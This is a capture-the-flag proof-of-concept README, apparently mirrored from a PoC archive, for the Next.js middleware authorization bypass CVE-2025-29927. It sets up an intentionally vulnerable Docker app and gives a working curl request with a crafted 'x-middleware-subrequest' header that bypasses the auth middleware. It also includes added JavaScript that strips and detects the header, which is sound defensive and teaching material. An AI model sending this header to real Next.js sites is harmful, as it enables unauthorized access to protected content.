# CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)
This is a **Capture The Flag (CTF)** styled Proof of Concept for the **Next.js Middleware Authorization Bypass** vulnerability (**CVE-2025-29927**). The goal is to bypass the auth middleware and retrieve the flag from the `/protected` route.
---
## Vulnerability Summary
- **CVE**: CVE-2025-29927
- **Type**: Authorization Bypass
- **Component**: Next.js Middleware
- **Impact**: Unauthorized access to protected routes
- **PoC Target Route**: `/protected`
- **Expected Behavior**: Unauthorized users are redirected to `/`
- **Vulnerable Behavior**: Using a crafted request allows bypassing the redirect and accessing the protected content directly
---
## PoC Setup
### 1. Clone the Repository
```bash
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker
```
---
### 2. Build and Run the Vulnerable App
```bash
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app
```
This starts the vulnerable Next.js app on **http://IP:3000**, where `IP` is the address of the Docker host.
---
## Exploitation
### 1. Without Exploit
Try accessing:
```bash
curl -i http://IP:3000/protected
```
You will be redirected to `/`.
Sending the same request with the crafted `x-middleware-subrequest` header (the manual form of the bypass) returns the protected content instead of the redirect:
```bash
curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected
```
### 2. With Exploit
Use the provided `exploit.py` to bypass the middleware and access the protected route:
```bash
python3 exploit.py -url http://IP:3000
```
If successful, you will retrieve the flag from `/protected`.
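The bypass works because the header above is meant to be set only internally by Next.js when its middleware re-invokes itself, so a request that carries it from outside is never legitimate. The durable fix is upgrading Next.js to a patched release; the vendor-recommended interim mitigation is to drop that header at the reverse proxy or edge in front of the app. The following is an added defender-side example, not code from this PoC repository: `sanitizeInboundHeaders` strips the header from an inbound request's header map and reports whether it was present, and `findSubrequestHeaderAbuse` scans access-log lines (a constructed JSON-per-line format assumed here, with an `ip`, `path` and `headers` field per entry) to surface requests that carried it.

```javascript
// Added example (not part of the CVE-2025-29927 PoC repository).
// Defensive handling of the Next.js-internal x-middleware-subrequest header:
// strip it at the edge and flag its presence in access logs.
// Upgrading Next.js is the real fix; this is the interim mitigation/detection.

const SUBREQUEST_HEADER = 'x-middleware-subrequest';

// Return a copy of the inbound headers with the internal-only header removed,
// plus a flag so the caller can log/alert on the attempt. Header names are
// compared case-insensitively because HTTP header names are case-insensitive.
function sanitizeInboundHeaders(headers) {
  const cleaned = {};
  let flagged = false;
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === SUBREQUEST_HEADER) {
      flagged = true;
      continue;
    }
    cleaned[name] = value;
  }
  return { headers: cleaned, flagged };
}

// Scan access-log text (assumed format: one JSON object per line with
// "ip", "path" and a "headers" map) and report entries that carried the
// header from outside the app. Malformed lines are skipped, not fatal.
function findSubrequestHeaderAbuse(logText) {
  const hits = [];
  for (const line of logText.split('\n')) {
    if (!line.trim()) continue;
    let entry;
    try {
      entry = JSON.parse(line);
    } catch {
      continue; // not a JSON log line; ignore
    }
    const hdrs = entry.headers || {};
    const key = Object.keys(hdrs).find(
      (k) => k.toLowerCase() === SUBREQUEST_HEADER
    );
    if (key !== undefined) {
      hits.push({ ip: entry.ip, path: entry.path, value: hdrs[key] });
    }
  }
  return hits;
}

// Constructed sample log (not real traffic): one benign request to
// /protected, one carrying the header (mixed-case name), one to /.
const SAMPLE_LOG = [
  JSON.stringify({ ip: '10.0.0.5', path: '/protected', headers: { 'user-agent': 'curl/8.0' } }),
  JSON.stringify({ ip: '10.0.0.9', path: '/protected', headers: { 'X-Middleware-Subrequest': 'middleware' } }),
  JSON.stringify({ ip: '10.0.0.7', path: '/', headers: {} }),
  'not json at all',
].join('\n');

// Stand-alone demo: sanitize one request and scan the sample log.
const demo = sanitizeInboundHeaders({ Host: 'app.example', 'X-Middleware-Subrequest': 'middleware' });
console.log('stripped header present:', demo.flagged, '| forwarded headers:', demo.headers);
console.log('suspicious log entries:', findSubrequestHeaderAbuse(SAMPLE_LOG));
```

At a proxy, call `sanitizeInboundHeaders` on every inbound request before forwarding to the Next.js origin and raise an alert whenever `flagged` is true; the log scanner gives the same signal retrospectively for traffic that reached the app before the mitigation was in place.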
---
## Files
- `Dockerfile` - Builds the vulnerable Next.js application
- `exploit.py` - Exploits the vulnerability to bypass auth
- `pages/` - Contains the vulnerable `/protected` and `/login` routes
- `middleware.js` - The vulnerable middleware logic
- `README.md` - This file
---
## Disclaimer
This PoC is for **educational and research purposes only**. Do not use it against systems you do not own or have explicit permission to test.
---
## 🏁 Flag
Find the flag by exploiting the vulnerability and accessing:
```
http://IP:3000/protected
```
Good luck! 🏴‍☠️
File snapshot
```
[4.0K] /data/pocs/5fc47cddf1f9b5abd276fd539b4ebaed792eb653
├── [1.9K] exploit.py
├── [4.0K] nextjs-docker
│   ├── [ 404] Dockerfile
│   ├── [ 417] middleware.js
│   ├── [ 271] package.json
│   └── [4.0K] pages
│       ├── [4.0K] api
│       │   └── [ 478] login.js
│       ├── [ 667] index.js
│       ├── [1.8K] login.js
│       └── [ 530] protected.js
└── [2.1K] README.md

3 directories, 9 files
```
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has been removed or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.